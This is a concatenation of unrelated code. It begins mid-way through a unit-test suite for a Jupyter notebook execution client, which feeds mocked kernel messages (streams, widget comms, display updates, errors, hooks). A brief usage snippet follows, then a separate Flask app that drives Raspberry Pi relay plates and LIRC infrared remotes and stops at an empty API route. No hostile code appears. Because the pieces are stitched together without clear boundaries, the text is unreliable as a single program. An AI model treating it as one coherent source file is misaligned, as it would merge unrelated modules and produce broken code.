        # A stdout stream, followed by a wait clear, an update_display_data, and then an idle
        assert message_mock.call_count == 4
        # Should still be pending; update_display_data doesn't trigger the clear
        assert executor.clear_before_next_output
        # Ensure the output wasn't cleared yet because update_display doesn't add outputs
        assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]

    @prepare_cell_mocks(
        {
            'msg_type': 'execute_reply',
            'header': {'msg_type': 'execute_reply'},
            'content': {'execution_count': 42},
        }
    )
    def test_execution_count_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # An execution count followed by an idle
        assert message_mock.call_count == 2
        assert cell_mock.execution_count == 42
        # Ensure no outputs were generated
        assert cell_mock.outputs == []

    @prepare_cell_mocks(
        {
            'msg_type': 'execute_reply',
            'header': {'msg_type': 'execute_reply'},
            'content': {'execution_count': 42},
        }
    )
    def test_execution_count_message_ignored_on_override(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0, execution_count=21)
        # An execution count followed by an idle
        assert message_mock.call_count == 2
        assert cell_mock.execution_count == 21
        # Ensure no outputs were generated
        assert cell_mock.outputs == []

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'execution_count': 42, 'name': 'stdout', 'text': 'foo'},
        }
    )
    def test_execution_count_with_stream_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # An execution count followed by an idle
        assert message_mock.call_count == 2
        assert cell_mock.execution_count == 42
        # Should also consume the message stream
        assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]

    @prepare_cell_mocks(
        {
            'msg_type': 'comm',
            'header': {'msg_type': 'comm'},
            'content': {'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}}},
        }
    )
    def test_widget_comm_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # A comm message without buffer info followed by an idle
        assert message_mock.call_count == 2
        self.assertEqual(executor.widget_state, {'foobar': {'foo': 'bar'}})
        # Buffers should still be empty
        assert not executor.widget_buffers
        # Ensure no outputs were generated
        assert cell_mock.outputs == []

    @prepare_cell_mocks(
        {
            'msg_type': 'comm',
            'header': {'msg_type': 'comm'},
            'buffers': [b'123'],
            'content': {
                'comm_id': 'foobar',
                'data': {'state': {'foo': 'bar'},
'buffer_paths': [['path']]}, }, } ) def test_widget_comm_buffer_message_single(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A comm message with buffer info followed by an idle assert message_mock.call_count == 2 assert executor.widget_state == {'foobar': {'foo': 'bar'}} assert executor.widget_buffers == { 'foobar': {('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}} } # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'comm', 'header': {'msg_type': 'comm'}, 'buffers': [b'123'], 'content': { 'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]}, }, }, { 'msg_type': 'comm', 'header': {'msg_type': 'comm'}, 'buffers': [b'123'], 'content': { 'comm_id': 'foobar', 'data': {'state': {'foo2': 'bar2'}, 'buffer_paths': [['path2']]}, }, }, ) def test_widget_comm_buffer_messages(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A comm message with buffer info followed by an idle assert message_mock.call_count == 3 assert executor.widget_state == {'foobar': {'foo': 'bar', 'foo2': 'bar2'}} assert executor.widget_buffers == { 'foobar': { ('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}, ('path2',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path2']}, } } # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'comm', 'header': {'msg_type': 'comm'}, 'content': { 'comm_id': 'foobar', # No 'state' 'data': {'foo': 'bar'}, }, } ) def test_unknown_comm_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An unknown comm message followed by an idle assert message_mock.call_count == 2 # Widget states should be empty as the message has the wrong shape assert not executor.widget_state assert not executor.widget_buffers # Ensure no outputs were generated assert cell_mock.outputs == [] @prepare_cell_mocks( { 'msg_type': 'execute_result', 'header': {'msg_type': 'execute_result'}, 'content': { 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, 'execution_count': 42, }, } ) def test_execute_result_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An execute followed by an idle assert message_mock.call_count == 2 assert cell_mock.execution_count == 42 # Should generate an associated message assert cell_mock.outputs == [ { 'output_type': 'execute_result', 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, 'execution_count': 42, } ] # No display id was provided assert not executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'execute_result', 'header': {'msg_type': 'execute_result'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, 'execution_count': 42, }, } ) def test_execute_result_with_display_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An execute followed by an idle assert message_mock.call_count == 2 assert cell_mock.execution_count == 42 # Should generate an associated message assert cell_mock.outputs == [ { 'output_type': 'execute_result', 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, 'execution_count': 42, } ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}}, } ) def test_display_data_without_id_message(self, 
executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A display followed by an idle assert message_mock.call_count == 2 # Should generate an associated message assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, } ] # No display id was provided assert not executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, }, } ) def test_display_data_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A display followed by an idle assert message_mock.call_count == 2 # Should generate an associated message assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, } ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, }, }, { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar_other'}, 'metadata': {'metafoo_other': 'metabar_other'}, 'data': {'foo': 'bar_other'}, }, }, { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, }, ) def test_display_data_same_id_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A display followed by an idle assert message_mock.call_count == 4 # Original output should be manipulated and a copy of the second now assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, { 'output_type': 'display_data', 'metadata': {'metafoo_other': 'metabar_other'}, 'data': {'foo': 'bar_other'}, }, { 'output_type': 'display_data', 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'update_display_data', 'header': {'msg_type': 'update_display_data'}, 'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}}, } ) def test_update_display_data_without_id_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An update followed by an idle assert message_mock.call_count == 2 # Display updates don't create any outputs assert cell_mock.outputs == [] # No display id was provided assert not executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, }, { 'msg_type': 'update_display_data', 'header': {'msg_type': 'update_display_data'}, 'content': { 'transient': {'display_id': 'foobar2'}, 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, }, ) def test_update_display_data_mismatch_id_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An update followed by an idle assert message_mock.call_count == 3 # Display updates don't create any outputs assert cell_mock.outputs == [ { 'output_type': 
'display_data', 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, } ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'display_data', 'header': {'msg_type': 'display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}, }, }, { 'msg_type': 'update_display_data', 'header': {'msg_type': 'update_display_data'}, 'content': { 'transient': {'display_id': 'foobar'}, 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, }, }, ) def test_update_display_data_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # A display followed by an update then an idle assert message_mock.call_count == 3 # Original output should be manipulated assert cell_mock.outputs == [ { 'output_type': 'display_data', 'metadata': {'metafoo2': 'metabar2'}, 'data': {'foo': 'bar2', 'baz': 'foobarbaz'}, } ] assert 'foobar' in executor._display_id_map @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, } ) def test_error_message(self, executor, cell_mock, message_mock): executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 2 # Should also consume the message stream assert cell_mock.outputs == [ {'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']} ] @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, }, reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, }, ) def test_error_and_error_status_messages(self, executor, cell_mock, message_mock): with self.assertRaises(CellExecutionError): executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 2 # Cell outputs should still be copied assert cell_mock.outputs == [ {'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']} ] @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, }, reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # OK 'content': {'status': 'ok'}, }, ) def test_error_message_only(self, executor, cell_mock, message_mock): # Should NOT raise executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 2 # Should also consume the message stream assert cell_mock.outputs == [ {'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']} ] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_allow_errors(self, executor, cell_mock, message_mock): executor.allow_errors = True # Should NOT raise executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 1 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error', 'ename': 'NotImplementedError'}, } ) def test_allow_error_names(self, executor, cell_mock, message_mock): executor.allow_error_names = ['NotImplementedError'] # Should NOT raise executor.execute_cell(cell_mock, 0) # An 
error followed by an idle assert message_mock.call_count == 1 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_raises_exception_tag(self, executor, cell_mock, message_mock): cell_mock.metadata['tags'] = ['raises-exception'] # Should NOT raise executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 1 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_non_code_cell(self, executor, cell_mock, message_mock): cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[]) # Should NOT raise nor execute any code executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 0 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_no_source(self, executor, cell_mock, message_mock): cell_mock = NotebookNode( # Stripped source is empty source=' ', metadata={}, cell_type='code', outputs=[], ) # Should NOT raise nor execute any code executor.execute_cell(cell_mock, 0) # An error followed by an idle assert message_mock.call_count == 0 # Should also consume the message stream assert cell_mock.outputs == [] @prepare_cell_mocks() def test_cell_hooks(self, executor, cell_mock, message_mock): executor, hooks = get_executor_with_hooks(executor=executor) executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_complete"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_executed"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_OK ) hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called() @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, }, reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, }, ) def test_error_cell_hooks(self, executor, cell_mock, message_mock): executor, hooks = get_executor_with_hooks(executor=executor) with self.assertRaises(CellExecutionError): executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_complete"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_executed"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_ERROR ) hooks["on_cell_error"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_ERROR ) hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called() @prepare_cell_mocks( reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 
'execute_reply'}, # ERROR 'content': {'status': 'error'}, } ) def test_non_code_cell_hooks(self, executor, cell_mock, message_mock): cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[]) executor, hooks = get_executor_with_hooks(executor=executor) executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_not_called() hooks["on_cell_complete"].assert_not_called() hooks["on_cell_executed"].assert_not_called() hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called() @prepare_cell_mocks() def test_async_cell_hooks(self, executor, cell_mock, message_mock): executor, hooks = get_executor_with_hooks(executor=executor, async_hooks=True) executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_complete"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_executed"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_OK ) hooks["on_cell_error"].assert_not_called() hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called() @prepare_cell_mocks( { 'msg_type': 'error', 'header': {'msg_type': 'error'}, 'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}, }, reply_msg={ 'msg_type': 'execute_reply', 'header': {'msg_type': 'execute_reply'}, # ERROR 'content': {'status': 'error'}, }, ) def test_error_async_cell_hooks(self, executor, cell_mock, message_mock): executor, hooks = get_executor_with_hooks(executor=executor, async_hooks=True) with self.assertRaises(CellExecutionError): executor.execute_cell(cell_mock, 0) hooks["on_cell_start"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_execute"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_complete"].assert_called_once_with(cell=cell_mock, cell_index=0) hooks["on_cell_executed"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_ERROR ) hooks["on_cell_error"].assert_called_once_with( cell=cell_mock, cell_index=0, execute_reply=EXECUTE_REPLY_ERROR ) hooks["on_notebook_start"].assert_not_called() hooks["on_notebook_complete"].assert_not_called() hooks["on_notebook_error"].assert_not_called()
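For reference, a minimal sketch of the public execution API these tests exercise, assuming nbclient and nbformat are installed; the notebook paths are placeholders:

# Execute a notebook end-to-end with the client under test (paths are placeholders).
import nbformat
from nbclient import NotebookClient

nb = nbformat.read('Untitled.ipynb', as_version=4)
client = NotebookClient(nb, timeout=600, kernel_name='python3')
client.execute()  # runs every code cell, raising CellExecutionError on failure
nbformat.write(nb, 'Untitled.executed.ipynb')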
raspi_ir_relay.py
#!/usr/bin/python
# Copyright (c) 2016, <name of copyright holder>
# Author: Tygart, Adam <mozestygart@gmail.com>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the <organization> nor the
#       names of its contributors may be used to endorse or promote products
#       derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

from __future__ import print_function

from flask import Flask, url_for, jsonify, make_response, render_template, json,\
    request
import flask_from_url
import time
import os
import subprocess
import fcntl
from flask_socketio import SocketIO, emit
from threading import Thread

TESTING = False
try:
    import piplates.RELAYplate as RELAY
except Exception:
    print("Warning: piplates controller could not be loaded")
    print("Warning: enabling TESTING mode")
    TESTING = True
    import testingRELAYplate as RELAY

DEBUG = True
LIRCD_CONF = '/etc/lirc/lircd.conf'
REMOTE_CONF_DIR = 'remotes'
MACRO_CONF_DIR = 'macros'
PLATE_CONF_DIR = 'plates'
LIRC_DEVICE = '/dev/lirc0'
IP_ADDRESS = "0.0.0.0"
PORT = 5000
REGISTER_ZEROCONF = True

app = Flask(__name__)
app.config.from_object(__name__)
app.config.from_envvar('RASPI_IR_RELAY_SETTINGS', silent=True)
socketio = SocketIO(app)

if REGISTER_ZEROCONF:
    import socket
    try:
        from zeroconf import ServiceInfo, Zeroconf
        if socket.getfqdn() == socket.gethostname():
            FQDN = socket.gethostname() + ".local"
        else:
            FQDN = socket.getfqdn()
    except ImportError:
        print("Couldn't import ZeroConf Services")
        REGISTER_ZEROCONF = False

if REGISTER_ZEROCONF and IP_ADDRESS != "0.0.0.0":
    ZC_IP_ADDRESS = IP_ADDRESS
else:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('10.255.255.255', 0))
        ZC_IP_ADDRESS = s.getsockname()[0]
    except Exception as ex:
        print(str(ex))
        print("Unfortunately we weren't able to determine a local IP")
        print("address for Zeroconf registration. Please specify one")
        print("in the configuration file.")
        REGISTER_ZEROCONF = False

irrecord_proc = None
irrecord_sender_thread = None

if not os.path.isabs(REMOTE_CONF_DIR):
    REMOTE_CONF_DIR = os.path.join(
        os.path.dirname(os.path.abspath(__file__)),
        REMOTE_CONF_DIR
    )
if not os.path.isabs(MACRO_CONF_DIR):
    MACRO_CONF_DIR = os.path.join(
        os.path.dirname(os.path.abspath(__file__)),
        MACRO_CONF_DIR
    )
if not os.path.isabs(PLATE_CONF_DIR):
    PLATE_CONF_DIR = os.path.join(
        os.path.dirname(os.path.abspath(__file__)),
        PLATE_CONF_DIR
    )

def get_list_of_relay_plates():
    plates = []
    i = 0
    for plate in RELAY.relaysPresent:
        if plate == 1:
            plates.append(i)
        i += 1
    return plates

def setup_relay_plate_dir():
    if not os.path.exists(PLATE_CONF_DIR):
        os.mkdir(PLATE_CONF_DIR)
    elif not os.path.isdir(PLATE_CONF_DIR):
        raise Exception("Incorrect PLATE_CONF_DIR configuration")

def load_relay_plate_conf(plate_num):
    setup_relay_plate_dir()
    plate_fn = os.path.join(PLATE_CONF_DIR, "plate_{}.json".format(plate_num))
    if not os.path.exists(plate_fn) or not os.path.isfile(plate_fn):
        plate_conf = {"name": "plate_{}".format(plate_num)}
        for relay in range(1, 8):
            plate_conf['relay_{}'.format(relay)] = 'relay_{}'.format(relay)
    else:
        with open(plate_fn, 'r') as f:
            plate_conf = json.load(f)
    return plate_conf

def save_relay_plate_conf(plate_num, plate_conf):
    setup_relay_plate_dir()
    plate_fn = os.path.join(PLATE_CONF_DIR, "plate_{}.json".format(plate_num))
    with open(plate_fn, 'w') as f:
        json.dump(plate_conf, f)

def initial_relay_state():
    initial_fn = os.path.join(PLATE_CONF_DIR, "initial_state.json")
    if not os.path.exists(initial_fn) or not os.path.isfile(initial_fn):
        return
    with open(initial_fn, 'r') as f:
        initial_state = json.load(f)
    for i_plate_conf in initial_state.items():
        curr_state = get_state_of_relays_on_plate(int(i_plate_conf[0]))
        for relay in i_plate_conf[1].keys():
            if i_plate_conf[1][relay] != curr_state[int(relay)]:
                toggle_state_of_relay(int(i_plate_conf[0]), int(relay))

def get_state_of_relays_on_plate(plate_num):
    if RELAY.getADDR(plate_num) != plate_num:
        raise Exception("Plate Number is invalid")
    status_num = RELAY.relaySTATE(plate_num)
    relay_status = {}
    relay_num = 0
    while relay_num < 7:
        relay_num += 1
        if status_num & 1 == 1:
            relay_status[relay_num] = 'on'
        else:
            relay_status[relay_num] = 'off'
        status_num = status_num >> 1
    return relay_status

def toggle_state_of_relay(plate_num, relay_num):
    RELAY.relayTOGGLE(plate_num, relay_num)
    relay_status = get_state_of_relays_on_plate(plate_num)
    return relay_status[relay_num]

def toggle_leds_on_plate(plate_num):
    if plate_num not in get_list_of_relay_plates():
        raise Exception("Plate Number is invalid")
    RELAY.toggleLED(plate_num)

def setup_remote_conf_dir():
    if not os.path.exists(REMOTE_CONF_DIR):
        os.mkdir(REMOTE_CONF_DIR)
    elif not os.path.isdir(REMOTE_CONF_DIR):
        raise Exception("Incorrect REMOTE_CONF_DIR configuration")

def get_list_of_remotes():
    setup_remote_conf_dir()
    remotes = []
    for item in os.listdir(REMOTE_CONF_DIR):
        if '.conf' not in item:
            continue
        remotes.append(item.split('.conf')[0])
    return remotes

def get_list_of_buttons_for_irrecord():
    proc = subprocess.Popen(
        ['irrecord', '--list-namespace'],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    )
    buttons, error = proc.communicate()
    if proc.returncode > 0:
        raise Exception(error)
    lb = []
    for button in buttons.decode('ascii', 'ignore').split('\n'):
        if button == '':
            continue
        lb.append(button.strip())
    return lb

def generate_lircd_conf():
    with open(LIRCD_CONF, 'w') as f:
        for remote in get_list_of_remotes():
            f.write(
                'include "{}"\n'.format(
                    os.path.join(
                        REMOTE_CONF_DIR,
                        '{}.conf'.format(remote)
                    )
                )
            )

def irrecord_output_sender():
    global irrecord_proc
    while True:
        if irrecord_proc is None:
            time.sleep(1)
            continue
        try:
            data = irrecord_proc.stdout.read()
        except IOError:
            time.sleep(1)
            continue
        print("Read data from irrecord stdout: {}".format(data))
        socketio.emit('irrecord output', {'data': data}, namespace='/irrecord')

def start_irrecord(remote):
    global irrecord_proc
    global irrecord_sender_thread
    if irrecord_sender_thread is None:
        irrecord_sender_thread = Thread(target=irrecord_output_sender)
        irrecord_sender_thread.daemon = True
        irrecord_sender_thread.start()
    pwd = os.getcwd()
    os.chdir(REMOTE_CONF_DIR)
    irrecord_proc = subprocess.Popen(
        ['irrecord', '-d', LIRC_DEVICE, remote],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT
    )
    fcntl.fcntl(irrecord_proc.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
    os.chdir(pwd)

def send_irrecord_button(button):
    global irrecord_proc
    if irrecord_proc is None:
        raise Exception('irrecord not running')
    irrecord_proc.stdin.write("{}\n".format(button))
    irrecord_proc.stdin.flush()

def set_remote_definition(remote_json, remote_name=None):
    setup_remote_conf_dir()
    ds_name = list(remote_json.keys())[0]
    if remote_name is None:
        remote_name = ds_name
    remote_fn = "{}.conf".format(remote_name)
    with open(os.path.join(REMOTE_CONF_DIR, remote_fn), 'w') as f:
        for line in remote_json[ds_name].split('\n'):
            if 'begin remote' in line:
                named = False
            if 'name' in line:
                line = '\tname {}\n'.format(remote_name)
                named = True
            if 'begin codes' in line and not named:
                f.write('\tname {}\n'.format(remote_name))
            if 'end remote' in line:
                f.write('{}\n'.format(line))
                break
            f.write('{}\n'.format(line))
    generate_lircd_conf()

def remove_remote_definition(remote_name):
    setup_remote_conf_dir()
    os.remove(os.path.join(
        REMOTE_CONF_DIR,
        "{}.conf".format(remote_name)
    ))
    generate_lircd_conf()

def get_list_of_remote_buttons(remote_name):
    conf_file = os.path.join(REMOTE_CONF_DIR, "{}.conf".format(remote_name))
    buttons = []
    namespace_buttons = get_list_of_buttons_for_irrecord()
    with open(conf_file, 'r') as f:
        started_codes = False
        started_raw_codes = False
        for line in f:
            if 'begin codes' in line:
                started_codes = True
                continue
            if 'begin raw_codes' in line:
                started_raw_codes = True
                continue
            if not started_codes and not started_raw_codes:
                continue
            if 'end codes' in line or 'end raw_codes' in line:
                break
            if started_codes:
                line = line.strip()
                if '#' in line:
                    line, comment = line.split('#', 1)
                    line = line.split()[0]
                else:
                    line = line.split()[0]
                    comment = line
            if started_raw_codes:
                line = line.strip()
                if 'name' not in line:
                    continue
                if '#' in line:
                    line, comment = line.split('#', 1)
                    line = line.split()[1]
                else:
                    line = line.split()[1]
                    comment = line
            button = line.strip()
            comment = comment.strip()
            if button not in namespace_buttons:
                continue
            if comment in namespace_buttons:
                comment = comment[4:].title()
            buttons.append([button, comment])
        else:
            raise Exception("Malformed remote configuration")
    return buttons

def press_ir_button(remote, button):
    cmd = subprocess.Popen(
        ['irsend', 'SEND_ONCE', remote, button],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE)
    stdout, stderr = cmd.communicate()
    if len(stderr) > 0 or cmd.returncode > 0:
        raise Exception(stderr)

def setup_macro_conf_dir():
    if not os.path.exists(MACRO_CONF_DIR):
        os.mkdir(MACRO_CONF_DIR)
    elif not os.path.isdir(MACRO_CONF_DIR):
        raise Exception("Incorrect MACRO_CONF_DIR configuration")

def get_list_of_macros():
    setup_macro_conf_dir()
    macros = []
    for item in os.listdir(MACRO_CONF_DIR):
        if '.json' not in item:
            continue
        macros.append(item.split('.json')[0])
    return macros

def get_macro_definition(macro_name):
    macrolist = get_list_of_macros()
    macro_fn = "{}.json".format(macro_name)
    if macro_name not in macrolist:
        raise Exception("Macro undefined")
    with open(os.path.join(MACRO_CONF_DIR, macro_fn), 'r') as f:
        return json.load(f)

def set_macro_definition(macro_json, macro_name=None):
    setup_macro_conf_dir()
    ds_name = list(macro_json.keys())[0]
    if macro_name is None:
        macro_name = ds_name
    macro_fn = "{}.json".format(macro_name)
    with open(os.path.join(MACRO_CONF_DIR, macro_fn), 'w') as f:
        json.dump(macro_json[ds_name], f)

def remove_macro_definition(macro_name):
    setup_macro_conf_dir()
    os.remove(os.path.join(
        MACRO_CONF_DIR,
        "{}.json".format(macro_name)
    ))

@app.route('/')
def home():
    return render_template('home.html')

@app.route('/wss')
def websockets():
    return render_template('wss.html')

@app.route('/api/')
def api_versions():
    return jsonify(v1=url_for('api_v1'))

@app.route('/api/v1/')
def api_v1():
